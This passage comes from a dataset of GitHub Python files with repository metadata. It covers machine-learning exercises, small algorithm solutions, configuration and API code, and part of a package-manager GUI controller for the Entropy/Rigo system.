ax.scatter(positive2[\"test1\"], positive2[\"test2\"],\n# c=\"b\", marker=\"o\", label=\"accepted\")\n# ax.scatter(negative2[\"test1\"], negative2[\"test2\"],\n# c=\"r\", marker=\"x\", label=\"rejected\")\n# ax.legend()\n# ax.set_xlabel(\"test1 score\")\n# ax.set_ylabel(\"test2 score\")\n# plt.show()\n\n# 特征映射\ndegree = 6\ndata2 = data2_init\nx1 = data2[\"test1\"]\nx2 = data2[\"test2\"]\n\ndata2.insert(3, \"ones\", 1)\n\nfor i in range(1, degree+1):\n for j in range(0, i+1):\n data2[\"f\"+str(i-j)+str(j)] = np.power(x1, i-j)*np.power(x2, j)\n\n# 删除test1这一列,axis=1代表删除的是列,inplace就地删除并且不放回所要删除的东西\ndata2.drop(\"test1\", axis=1, inplace=True)\ndata2.drop(\"test2\", axis=1, inplace=True)\n# print(data2.head())\n\n# 代价函数和梯度\n\n# 正则化代价函数\n\n\ndef costREG(theta, x, y, learningRate):\n theta = np.matrix(theta)\n x = np.matrix(x)\n y = np.matrix(y)\n first = np.multiply(-y, np.log(S(x*theta.T)))\n second = np.multiply((1-y), np.log(1-S(x*theta.T)))\n reg = (learningRate/(2*len(x))) * \\\n np.sum(np.power(theta[:, 1:theta.shape[1]], 2))\n return 
np.sum(first-second)/len(x)+reg\n\n\n# 正则化梯度函数\ndef gradientREG(theta, x, y, learningRate):\n theta = np.matrix(theta)\n x = np.matrix(x)\n y = np.matrix(y)\n\n parameters = int(theta.ravel().shape[1])\n grad = np.zeros(parameters)\n\n error = S(x*theta.T)-y\n\n for i in range(parameters):\n term = np.multiply(error, x[:, i])\n\n if i == 0:\n grad[i] = np.sum(term)/len(x)\n else:\n grad[i] = (np.sum(term)/len(x))+((learningRate/len(x))*theta[:, i])\n return grad\n\n\n# 初始化x,y,theta\ncols = data2.shape[1]\nx2 = data2.iloc[:, 1:cols]\ny2 = data2.iloc[:, 0:1]\ntheta2 = np.zeros(cols-1)\nx2 = np.array(x2.to_numpy())\ny2 = np.array(y2.to_numpy())\n\n# 布兰达设置为1\nlearningRate = 1\nresult2 = opt.fmin_tnc(func=costREG, x0=theta2,\n fprime=gradientREG, args=(x2, y2, learningRate))\n\n# 使用训练集评测模型的准确率\ntheta_min = np.matrix(result2[0])\npredictions = predict(theta_min, x2)\n\ncorrent = []\nfor (a, b) in zip(predictions, y2):\n if (a == 1 and b == 1) or (a == 0 and b == 0):\n corrent.append(1)\n else:\n corrent.append(0)\naccuracy = (sum(corrent))/len(corrent)\n# print(\"accuracy is {0}%\".format(accuracy*100))\n\n\ndef hfunc2(theta, x1, x2):\n temp = theta[0][0]\n place = 0\n for i in range(1, degree+1):\n for j in range(0, i+1):\n temp = temp + np.power(x1, i-j)*np.power(x2, j)*theta[0][place+1]\n place = place+1\n return temp\n\n\ndef find_decision_boundary(theta):\n t1 = np.linspace(-1, 1.5, 1000)\n t2 = np.linspace(-1, 1.5, 1000)\n\n cordinates = [(x, y) for x in t1 for y in t2]\n x_cord, y_cord = zip(*cordinates)\n h_val = pd.DataFrame({\"x1\": x_cord, \"x2\": y_cord})\n h_val[\"hval\"] = hfunc2(theta, h_val[\"x1\"], h_val[\"x2\"])\n\n decision = h_val[np.abs(h_val[\"hval\"]) < 2*10**-3]\n return decision.x1, decision.x2\n\nfig, ax = plt.subplots(figsize=(8,5))\nax.scatter(positive2['test1'], positive2['test2'], s=50, c='b', marker='o', label='Accepted')\nax.scatter(negative2['test1'], negative2['test2'], s=50, c='r', marker='x', label='Rejected')\nax.set_xlabel('Test 1 Score')\nax.set_ylabel('Test 2 Score')\n\nx, y = find_decision_boundary(result2)\nplt.scatter(x, y, c='y', s=10, label='Prediction')\nax.legend()\nplt.show()","repo_name":"r1ght0us/daily_practice","sub_path":"andrew/ml/ex2/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":7883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6819013666","text":"\"\"\"Structures for organizing e-prints into periods of time.\"\"\"\n\nimport collections\nimport datetime\nfrom typing import NamedTuple, List, Mapping, Optional, Dict, Iterator, Tuple\n\nfrom typing_extensions import Protocol\n\nfrom .base import CanonicalBase\nfrom .eprint import EPrint\nfrom .version import Event\nfrom .identifier import Identifier, VersionedIdentifier\nfrom .listing import Listing\nfrom .util import now\nfrom .version import Version\n\nYear = int\nMonth = int\nYearMonth = Tuple[Year, Month]\n\n\nclass EPrintDay(CanonicalBase):\n \"\"\"E-prints originally announced on a specific day.\"\"\"\n\n def __init__(self, date: datetime.date,\n eprints: Mapping[Identifier, EPrint]) -> None:\n \"\"\"Initialize with e-prints for a particular day.\"\"\"\n self.date = date\n self.eprints = eprints\n\n\nclass EPrintMonth(CanonicalBase):\n \"\"\"E-prints originally announced in a particular calendar month.\"\"\"\n\n def __init__(self, name: YearMonth,\n days: Mapping[datetime.date, EPrintDay]) -> None:\n \"\"\"Initialize with e-prints for a particular month.\"\"\"\n self.name = name\n self.days = days\n\n 
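Stepping back to the ex2.py record above: its costREG/gradientREG pair implements L2-regularized logistic regression while excluding the bias term theta[0] from the penalty. A compact vectorized restatement without np.matrix (a sketch under the same conventions, not code from any record):

import numpy as np

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def cost_reg(theta, x, y, lam):
    # theta: (n,), x: (m, n), y: (m,); lam is the regularization strength.
    m = len(x)
    h = sigmoid(x @ theta)
    unreg = -(y @ np.log(h) + (1 - y) @ np.log(1 - h)) / m
    penalty = lam / (2 * m) * np.sum(theta[1:] ** 2)  # skip the bias term
    return unreg + penalty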
@property\n def year(self) -> Year:\n return self.name[0]\n\n @property\n def month(self) -> Month:\n return self.name[1]\n\n\nclass EPrintYear(CanonicalBase):\n \"\"\"E-prints originally announced in a particular calendar year.\"\"\"\n\n def __init__(self, year: Year,\n months: Mapping[Tuple[int, int], EPrintMonth]) -> None:\n \"\"\"Initialize with e-prints for a particular year.\"\"\"\n self.year = year\n self.months = months\n\n\nclass AllEPrints(CanonicalBase):\n \"\"\"Represents the complete set of announced e-prints.\"\"\"\n\n def __init__(self, name: str,\n years: Mapping[int, EPrintYear]) -> None:\n \"\"\"Initialize with all of the e-prints in the record.\"\"\"\n self.name = name\n self.years = years\n","repo_name":"arXiv/arxiv-canonical","sub_path":"arxiv/canonical/domain/block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"126172769","text":"import pyspark\r\nfrom pyspark.sql import SparkSession\r\nfrom pyspark.ml.classification import DecisionTreeClassifier\r\nfrom pyspark.sql import functions\r\nfrom pyspark.ml.feature import StringIndexer\r\nfrom pyspark.ml.feature import VectorAssembler\r\nfrom pyspark.ml import Pipeline\r\nfrom pyspark.sql.functions import col\r\nfrom pyspark.ml.tuning import ParamGridBuilder, CrossValidator\r\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator\r\nfrom pyspark.mllib.evaluation import MulticlassMetrics\r\n\r\nspark = SparkSession.builder \\\r\n .master('local[*]') \\\r\n .config(\"spark.driver.memory\", \"15g\") \\\r\n .config(\"spark.logConf\", \"true\") \\\r\n .appName('my-app') \\\r\n .getOrCreate()\r\n\r\ndf = spark.read.csv('fueltype.csv',header=True)\r\ndf = df.dropna(subset='fuelType')\r\ndf = df.fillna('0')\r\n\r\n\r\ndf.show(5)\r\ndf.printSchema()\r\ndf = df.fillna('0')\r\n\r\nindexers = [StringIndexer(inputCol=column, outputCol=column+\"_n\").fit(df) for column in list(\r\n set(df.columns)-set(['_c0']))]#\r\n\r\npipeline = Pipeline(stages=indexers)\r\ndf_r = pipeline.fit(df).transform(df)\r\n\r\ndf_r = df_r.select(*(col(c).cast(\"int\").alias(c) for c in df_r.columns))\r\ndf_fea = df_r.drop('_c0','brand','name','bodyType','year','transmission','power','fuelType')\r\n\r\ndf_fea.show(5)\r\ndf_fea.printSchema() \r\n \r\nassembler = VectorAssembler(inputCols=['brand_n', 'name_n','bodyType_n','year_n',\r\n 'transmission_n','power_n'], outputCol='features')\r\noutput = assembler.transform(df_fea)\r\n\r\nfinal_data = output.select('features', 'fuelType_n')\r\n\r\nfinal_data.show(5)\r\n\r\ntrain_data,test_data = final_data.randomSplit([0.7,0.3])\r\n\r\n\r\nmodel = DecisionTreeClassifier(labelCol='fuelType_n',featuresCol='features', maxDepth=10)\r\n\r\n# Create ParamGrid for Cross Validation\r\ndtparamGrid = (ParamGridBuilder()\r\n .addGrid(model.maxDepth, [7, 10, 13, 15, 20])\r\n .addGrid(model.maxBins, [20, 40, 60, 80, 100])\r\n .build())\r\n\r\n# Evaluate model\r\ndtevaluator = MulticlassClassificationEvaluator(labelCol= 'fuelType_n',metricName='f1')#\r\n\r\n# Create 5-fold CrossValidator\r\ndtcv = CrossValidator(estimator = model,\r\n estimatorParamMaps = dtparamGrid,\r\n evaluator = dtevaluator,\r\n numFolds = 5)\r\n\r\ndtc_model = dtcv.fit(train_data)\r\n\r\ndtc_preds = dtc_model.transform(test_data)\r\n\r\npred_acc = dtevaluator.evaluate(dtc_preds)\r\n\r\ntrain_acc = dtevaluator.evaluate(dtc_model.transform(train_data))\r\n\r\npred_table = dtc_preds.select(\"features\", 
\"prediction\",'probability', \"fuelType_n\")\r\npred_table.show(10)\r\npred_table.sample(False, 0.1, seed=0).limit(10).show()\r\nprint('')\r\nprint('============================================')\r\nprint('')\r\nprint('')\r\nprint('F1-score train : ',train_acc )\r\nprint('')\r\nprint('F1-score test : ',pred_acc )\r\nprint('')\r\nprint('')\r\nprint('============================================')\r\nprint('')","repo_name":"Kit6330300038/datamining","sub_path":"model1.py","file_name":"model1.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25533967813","text":"import falcon\nfrom aness.resources import BaseResource\nfrom aness.schemas import IndexSchema\n\n\nclass IndexResource(BaseResource):\n\n def on_get(self, req, resp):\n obj = {\n 'id': req.context['request_id'],\n 'document_meta': {\n 'copyright': 'Nocopyright',\n \"authors\": [\n \"altereg0\"\n ]\n }\n }\n _schema = IndexSchema()\n unresult = _schema.dump(obj)\n resp.status = falcon.HTTP_200\n resp.media = unresult.data\n\n\n def generate_mock(self):\n _ = self._\n description = (\n lambda: {\n \"id\": _('uuid'),\n \"name\": _('word'),\n \"version\": _('version', pre_release=True),\n \"owner\": {\n \"email\": _('email', key=str.lower),\n \"token\": _('token'),\n \"creator\": _('full_name'),\n },\n }\n )\n schema = self._Schema(schema=description)\n j = schema.create(iterations=1)\n pass\n","repo_name":"altereg0/3EQ4MRKk","sub_path":"aness/resources/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9736345634","text":"from set_lib_dir import LIB_ROOT_DIR\n\ndataset_type = 'DroneDataset' \ndata_root = LIB_ROOT_DIR + '/data/'\n\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\n\ntrain_pipeline = [\n dict(type='LoadImageFromFile', to_float32=True, color_type='color'),\n dict(type='LoadAnnotations', with_bbox=True),\n dict(\n type='PhotoMetricDistortion',\n brightness_delta=32,\n contrast_range=(0.5, 1.5),\n saturation_range=(0.5, 1.5),\n hue_delta=18),\n dict(\n type='RandomCenterCropPad',\n crop_size=(512, 512),\n ratios=(0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3),\n mean=[0, 0, 0],\n std=[1, 1, 1],\n to_rgb=True,\n test_pad_mode=None),\n dict(type='Resize', img_scale=(512, 512), keep_ratio=True),\n dict(type='RandomFlip', flip_ratio=0.5),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='DefaultFormatBundle'),\n dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels'])\n]\ntest_pipeline = [\n dict(type='LoadImageFromFile', to_float32=True),\n dict(\n type='MultiScaleFlipAug',\n scale_factor=1.0,\n flip=False,\n transforms=[\n dict(type='Resize', keep_ratio=True),\n dict(\n type='RandomCenterCropPad',\n ratios=None,\n border=None,\n mean=[0, 0, 0],\n std=[1, 1, 1],\n to_rgb=True,\n test_mode=True,\n test_pad_mode=['logical_or', 31],\n test_pad_add_pix=1),\n dict(type='RandomFlip'),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='DefaultFormatBundle'),\n dict(\n type='Collect',\n meta_keys=('filename', 'ori_shape', 'img_shape', 'pad_shape',\n 'scale_factor', 'flip', 'flip_direction',\n 'img_norm_cfg', 'border'),\n keys=['img'])\n ])\n]\n\ndata = dict(\n samples_per_gpu=16,\n workers_per_gpu=4,\n train=dict(\n type=dataset_type,\n ann_file=data_root + 'drone2021/annotations/split_train_coco.json',\n img_prefix=data_root + 
'drone2021/images/',\n pipeline=train_pipeline),\n val=dict(\n type=dataset_type,\n ann_file=data_root + 'drone2021/annotations/split_val_coco.json',\n img_prefix=data_root + 'drone2021/images/',\n pipeline=test_pipeline),\n test=dict(\n type=dataset_type,\n ann_file=data_root + 'drone2021/annotations/split_val_coco.json',\n img_prefix=data_root + 'drone2021/images/',\n pipeline=test_pipeline))\nevaluation = dict(interval=1, metric='bbox')\n","repo_name":"IIM-TTIJ/MVA2023SmallObjectDetection4SpottingBirds","sub_path":"configs/mva2023_baseline/drone_dataset.py","file_name":"drone_dataset.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":80,"dataset":"github-code","pt":"40"} +{"seq_id":"73468015479","text":"class Solution(object):\n def sortColors(self, nums):\n # Count the occurrence of each color\n color_count = [0] * 3\n \n\n for i in range(len(nums)):\n color_count[nums[i]] += 1\n \n current_index = 0 # Keep track of the current index in the nums list\n \n # Iterate through the color_count array and \n # add the appropriate number of each color to the nums list\n for i in range(3):\n for j in range(color_count[i]): \n nums[current_index] = i\n current_index += 1\n return nums","repo_name":"Ketema741/Competitive-programming-group4","sub_path":"0075-sort-colors/0075-sort-colors.py","file_name":"0075-sort-colors.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"41707001008","text":"import argparse\nimport os\n\nimport pandas as pd\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_dir\", type=str, default=None)\n parser.add_argument(\"--output_dir\", type=str, default=None)\n\n args, _ = parser.parse_known_args()\n\n input_data_path = os.path.join(args.input_dir, \"train.csv\")\n output_data_path = os.path.join(args.output_dir, \"preprocessed.csv\")\n\n data = pd.read_csv(input_data_path)\n data.to_csv(output_data_path, header=False, index=False)\n","repo_name":"tkazusa/codepipeline-ml-cicd","sub_path":"stepfunctions_workflow/sm_processing/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1759476212","text":"\"\"\"\nYou are given an array of strings tokens that represents an arithmetic expression in a Reverse Polish Notation.\n\nEvaluate the expression. 
Return an integer that represents the value of the expression.\n\nNote that:\n\n The valid operators are '+', '-', '*', and '/'.\n Each operand may be an integer or another expression.\n The division between two integers always truncates toward zero.\n There will not be any division by zero.\n The input represents a valid arithmetic expression in a reverse polish notation.\n The answer and all the intermediate calculations can be represented in a 32-bit integer.\n\"\"\"\n\n\n#test case \n\ntokens0 = [\"2\",\"1\",\"+\",\"3\",\"*\"]\nout0 = 9 \n\ntokens1 = [\"4\",\"13\",\"5\",\"/\",\"+\"]\nout1 = 6\n\ntokens2 = [\"10\",\"6\",\"9\",\"3\",\"+\",\"-11\",\"*\",\"/\",\"*\",\"17\",\"+\",\"5\",\"+\"]\nout2 = 22\n\ntokens3 = [\"1\",\"3\",\"+\"]\nout3 = 4\n\ntokens4 = [\"18\"]\nout4 = 18\n\n\nclass Solution:\n\tdef evalRPN(self,tokens)->int:\n\t\t\"\"\"\n\t\tThe function evaluates the RPN based on the symbols\n\t\tArgs:\n\t\t\ttokens: (list) the list of the numbers and the symbols\n\t\tReturn:\n\t\t\tcal: (int) the value of the calculated integers based on the symbols\n\t\t\"\"\"\n\n\t\tstack = []\n\t\tleft = 0 \n\t\tlength = len(tokens) \n\t\tsymbol = (\"*\",\"/\",\"-\",\"+\")\n\n\n\t\twhile left < length:\n\n\t\t\tif tokens[left] not in symbol:\n\t\t\t\tstack.append(tokens[left])\n\t\t\telse:\n\t\t\t\t\n\t\t\t\tfirst = int(stack.pop())\n\t\t\t\tsecond = int(stack.pop())\n\t\t\t\t\n\t\t\t\tif tokens[left] == \"*\":\n\t\t\t\t\tcal = second * first\n\t\t\t\t\n\t\t\t\telif tokens[left] == \"/\":\n\t\t\t\t\tcal = int(second / first) # truncate toward zero, per the problem statement\n\n\t\t\t\telif tokens[left] == \"+\":\n\t\t\t\t\tcal = second + first\n\n\t\t\t\telif tokens[left] == \"-\":\n\t\t\t\t\tcal = second - first \n\n\t\t\t\tstack.append(cal)\n\n\t\t\tleft+=1\n\n\t\treturn int(stack.pop())\n\nsol = Solution()\nres = sol.evalRPN(tokens4)\n\nprint(res) ","repo_name":"abhishekprakash256/Python","sub_path":"leet_code_questions/neetcode_map/stacks/leet_code_polish_notation.py","file_name":"leet_code_polish_notation.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"42994421563","text":"from operator import mul, itemgetter, attrgetter\n# mul is used to multiply two numbers\n\n# itemgetter builds a function that fetches values from a dict\n\nsample = {\"a\": {\"b\": {\"c\": {\"d\": \"e\"}}}}\n\n\nclass S(object):\n def __init__(self, v):\n self.data = v\n\n def __repr__(self):\n return str(self.data)\n\n\nd = S(1)\nd.a = S(2)\nd.a.a2 = S(3)\n\n# func = itemgetter(\"a\", \"b\")\n# print(func)\n\n# print(func(sample))\n\nfunc2 = attrgetter(\"a.a2\") # attrgetter can fetch nested attributes\n\nprint(func2(d))\n\n\n","repo_name":"Niyuhang/read_books","sub_path":"fluent_python/chapter_5/funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33892838773","text":"# Fifty-Fifty\nd = {}\nfor s in input():\n if s not in d.keys():\n d[s] = 1\n else:\n d[s] += 1\n\nif list(d.values()) == [2,2]:\n print('Yes')\nelse:\n print('No')","repo_name":"SkiMsyk/AtCoder","sub_path":"BeginnerContest_A/132.py","file_name":"132.py","file_ext":"py","file_size_in_byte":179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70654161081","text":"import os\nimport errno\nimport copy\nimport dbus\nfrom threading import Lock, Semaphore, Timer\n\nfrom gi.repository import Gtk, GLib, GObject\n\nfrom _entropy.rigo.paths import CONF_DIR\nfrom _entropy.rigo.enums import RigoViewStates, 
AppActions, Icons\nfrom _entropy.rigo.models.application import Application, ApplicationMetadata\nfrom _entropy.rigo.models.preference import Preference\nfrom _entropy.rigo.utils import escape_markup, prepare_markup\nfrom _entropy.rigo.ui.gtk3.widgets.notifications import \\\n NotificationBox\n\nfrom entropy.cache import EntropyCacher\nfrom entropy.const import etpConst, const_debug_write, \\\n const_debug_enabled, const_convert_to_unicode\nfrom entropy.misc import ParallelTask\nfrom entropy.i18n import _\n\nimport kswitch\n\n\nclass ApplicationsViewController(GObject.Object):\n\n __gsignals__ = {\n # View has been cleared\n \"view-cleared\" : (GObject.SignalFlags.RUN_LAST,\n None,\n tuple(),\n ),\n # View has been filled\n \"view-filled\" : (GObject.SignalFlags.RUN_LAST,\n None,\n tuple(),\n ),\n # View has been filled\n \"view-want-change\" : (GObject.SignalFlags.RUN_LAST,\n None,\n (GObject.TYPE_PYOBJECT,\n GObject.TYPE_PYOBJECT,),\n ),\n # User logged in to Entropy Web Services\n \"logged-in\" : (GObject.SignalFlags.RUN_LAST,\n None,\n (GObject.TYPE_PYOBJECT,),\n ),\n # User logged out from Entropy Web Services\n \"logged-out\" : (GObject.SignalFlags.RUN_LAST,\n None,\n tuple(),\n ),\n }\n\n RECENT_SEARCHES_DIR = os.path.join(CONF_DIR, \"recent_searches\")\n RECENT_SEARCHES_CACHE_KEY = \"list\"\n RECENT_SEARCHES_MAX_LEN = 20\n MIN_RECENT_SEARCH_KEY_LEN = 2\n\n SHOW_INSTALLED_KEY = \"in:installed\"\n SHOW_EXACT_MATCH = \"in:exact\"\n SHOW_CATEGORY_KEY = \"in:category\"\n SHOW_QUEUE_KEY = \"in:queue\"\n SHOW_KERNEL_BINS_KEY = \"in:kernels\"\n SHOW_KERNEL_LTS_BINS_KEY = \"in:kernels-lts\"\n\n def __init__(self, activity_rwsem, entropy_client, entropy_ws,\n nc, bottom_nc, rigo_service, prefc, icons, nf_box,\n search_entry, search_entry_completion,\n search_entry_store, store, view):\n GObject.Object.__init__(self)\n\n self._activity_rwsem = activity_rwsem\n self._entropy = entropy_client\n self._service = rigo_service\n self._icons = icons\n self._entropy_ws = entropy_ws\n self._search_entry = search_entry\n self._store = store\n self._view = view\n self._nf_box = nf_box\n self._not_found_search_box = None\n self._not_found_label = None\n self._nc = nc\n self._bottom_nc = bottom_nc\n self._prefc = prefc\n\n self._kswitch = kswitch.KernelSwitcher(self._entropy)\n self._cacher = EntropyCacher()\n self._search_thread_mutex = Lock()\n\n self._search_completion = search_entry_completion\n self._search_completion_model = search_entry_store\n # speedup the damn ListStore\n self._search_completion_model_set = set()\n self._search_writeback_mutex = Lock()\n self._search_writeback_thread = None\n\n def _search_icon_release(self, search_entry, icon_pos, _other):\n \"\"\"\n Event associated to the Search bar icon click.\n Here we catch secondary icon click to reset the search entry text.\n \"\"\"\n if search_entry is not self._search_entry:\n return\n if icon_pos == Gtk.EntryIconPosition.SECONDARY:\n search_entry.set_text(\"\")\n self.clear()\n search_entry.emit(\"changed\")\n elif self._store.get_iter_first():\n # primary icon click will force UI to switch to Browser mode\n self.emit(\"view-filled\")\n else:\n self.emit(\"view-cleared\")\n\n def _search_activate(self, search_entry):\n text = search_entry.get_text()\n if not text:\n return self.clear()\n return self._search(text, _force=True)\n\n def _search_changed(self, search_entry):\n GLib.timeout_add(700, self._search, search_entry.get_text())\n\n def _search(self, old_text, _force=False):\n cur_text = self._search_entry.get_text()\n if (cur_text 
== old_text and cur_text) or _force:\n search_text = copy.copy(old_text)\n search_text = const_convert_to_unicode(\n search_text, enctype=etpConst['conf_encoding'])\n if _force:\n self._search_entry.set_text(search_text)\n th = ParallelTask(self.__search_thread, search_text)\n th.name = \"SearchThread\"\n th.start()\n\n def __search_produce_matches(self, text):\n \"\"\"\n Execute the actual search inside Entropy repositories.\n \"\"\"\n def _prepare_for_search(txt):\n return txt.replace(\" \", \"-\").lower()\n\n split_text = text.split()\n if not split_text:\n # text is empty, exit now\n return\n # support for search cmd + arguments\n # some search_cmds can have arguments provided\n search_cmd, search_args = split_text[0], split_text[1:]\n sort = False\n\n show_exact = search_cmd == ApplicationsViewController.SHOW_EXACT_MATCH\n\n with self._entropy.rwsem().reader():\n matches = []\n use_fallback = True\n\n # in:installed [ ...]\n if search_cmd == ApplicationsViewController.SHOW_INSTALLED_KEY:\n use_fallback = False\n sort = True\n\n inst_repo = self._entropy.installed_repository()\n with inst_repo.direct():\n if not search_args:\n for pkg_id in inst_repo.listAllPackageIds(\n order_by=\"atom\"):\n matches.append((pkg_id, inst_repo.repository_id()))\n else:\n for search_arg in search_args:\n for pkg_id in inst_repo.searchPackages(\n search_arg.lower(), just_id=True):\n matches.append(\n (pkg_id, inst_repo.repository_id()))\n\n elif search_cmd == \\\n ApplicationsViewController.SHOW_CATEGORY_KEY and \\\n search_args:\n use_fallback = False\n sort = True\n for search_arg in search_args:\n matches += self._entropy.atom_search(search_arg + \"/\")\n\n # package set search\n elif search_cmd.startswith(etpConst['packagesetprefix']):\n use_fallback = False\n sort = True\n sets = self._entropy.Sets()\n package_deps = sets.expand(text)\n for package_dep in package_deps:\n pkg_id, pkg_repo = self._entropy.atom_match(\n package_dep)\n if pkg_id != -1:\n matches.append((pkg_id, pkg_repo))\n\n elif show_exact and search_args:\n use_fallback = False\n for search_arg in search_args:\n pkg_matches, rc = self._entropy.atom_match(\n search_arg, multi_match=True,\n multi_repo=True, mask_filter=False)\n matches.extend(pkg_matches)\n\n # fallback search\n if not matches and use_fallback:\n pkg_matches, rc = self._entropy.atom_match(\n text, multi_match=True,\n multi_repo=True, mask_filter=False)\n matches.extend(pkg_matches)\n\n # atom searching (name and desc)\n search_matches = self._entropy.atom_search(\n text,\n repositories = self._entropy.repositories(),\n description = True)\n\n matches.extend([x for x in search_matches \\\n if x not in matches])\n\n if not search_matches:\n search_matches = self._entropy.atom_search(\n _prepare_for_search(text),\n repositories = self._entropy.repositories())\n matches.extend(\n [x for x in search_matches if x not in matches])\n\n if sort:\n matches.sort(key=self._sort_key)\n return matches\n\n def install(self, dependency, simulate=False):\n \"\"\"\n Try to match dependency to an Application and then install\n it, if possible.\n \"\"\"\n const_debug_write(\n __name__,\n \"install: %s\" % (dependency,))\n\n with self._entropy.rwsem().reader():\n pkg_match = self._entropy.atom_match(dependency)\n\n pkg_id, pkg_repo = pkg_match\n if pkg_id == -1:\n const_debug_write(\n __name__,\n \"install: \"\n \"no match for: %s\" % (dependency,))\n def _notify():\n msg = _(\"Application %s not found\")\n msg = msg % (dependency,)\n box = NotificationBox(\n prepare_markup(msg),\n 
message_type=Gtk.MessageType.ERROR,\n context_id=\"AppInstallNotFoundContextId\")\n self._nc.append(box, timeout=10)\n if self._nc is not None:\n GLib.idle_add(_notify)\n return\n\n app = Application(\n self._entropy, self._entropy_ws,\n self._service, pkg_match)\n self._service.application_request(\n app, AppActions.INSTALL, simulate=simulate)\n\n const_debug_write(\n __name__,\n \"install: \"\n \"application_request() sent for: %s, %s\" % (\n dependency, app,))\n\n def install_package(self, package_path, simulate=False):\n \"\"\"\n Install Entropy Package file.\n \"\"\"\n const_debug_write(\n __name__,\n \"install_package: %s\" % (package_path,))\n\n self._service.package_install_request(\n package_path, simulate=simulate)\n\n const_debug_write(\n __name__,\n \"install_package: \"\n \"package_install_request() sent for: %s\" % (\n package_path,))\n\n def remove(self, dependency, simulate=False):\n \"\"\"\n Try to match dependency to an Application and then remove\n it, if possible.\n \"\"\"\n const_debug_write(\n __name__,\n \"remove: %s\" % (dependency,))\n\n with self._entropy.rwsem().reader():\n inst_repo = self._entropy.installed_repository()\n pkg_repo = inst_repo.repository_id()\n with inst_repo.direct():\n pkg_id, rc = inst_repo.atomMatch(dependency)\n\n if pkg_id == -1:\n const_debug_write(\n __name__,\n \"remove: \"\n \"no match for: %s\" % (dependency,))\n def _notify():\n msg = _(\"Application %s not found\")\n msg = msg % (dependency,)\n box = NotificationBox(\n prepare_markup(msg),\n message_type=Gtk.MessageType.ERROR,\n context_id=\"AppRemoveNotFoundContextId\")\n self._nc.append(box, timeout=10)\n if self._nc is not None:\n GLib.idle_add(_notify)\n return\n\n app = Application(\n self._entropy, self._entropy_ws,\n self._service, (pkg_id, pkg_repo))\n self._service.application_request(\n app, AppActions.REMOVE, simulate=simulate)\n\n const_debug_write(\n __name__,\n \"remove: \"\n \"application_request() sent for: %s, %s\" % (\n dependency, app,))\n\n def upgrade(self, simulate=False):\n \"\"\"\n Launch a System Upgrade activity.\n \"\"\"\n const_debug_write(\n __name__, \"upgrade\")\n self._service.upgrade_system(simulate=simulate)\n const_debug_write(\n __name__, \"upgrade:\"\n \" upgrade_system() sent\")\n\n def _show_action_queue_items(self, _invalid_matches=False):\n \"\"\"\n Request the UI to show the current Action Queue, if any.\n \"\"\"\n const_debug_write(\n __name__, \"_show_action_queue_items called\")\n apps = self._service.action_queue_items()\n const_debug_write(\n __name__, \"_show_action_queue_items, items: %d\" % (len(apps),))\n\n matches = []\n if not _invalid_matches:\n for app in apps:\n const_debug_write(\n __name__, \"_show_action_queue_items:\"\n \" %s\" % (app,))\n matches.append(app.get_details().pkg)\n else:\n with self._entropy.rwsem().reader():\n inst_repo = self._entropy.installed_repository()\n repo_name = inst_repo.repository_id()\n matches.extend(\n [(-2, repo_name),\n (-5, repo_name),\n (-10, repo_name)])\n\n if matches:\n self.set_many_safe(matches,\n _from_search=ApplicationsViewController.SHOW_QUEUE_KEY)\n\n def __simulate_orphaned_apps(self, text):\n\n const_debug_write(\n __name__,\n \"__simulate_orphaned_apps: \"\n \"%s\" % (text,))\n with self._entropy.rwsem().reader():\n inst_repo = self._entropy.installed_repository()\n with inst_repo.direct():\n pkg_ids = inst_repo.searchPackages(text, just_id=True)\n manual_pkg_ids, rc = inst_repo.atomMatch(text, multiMatch=True)\n\n def _notify():\n 
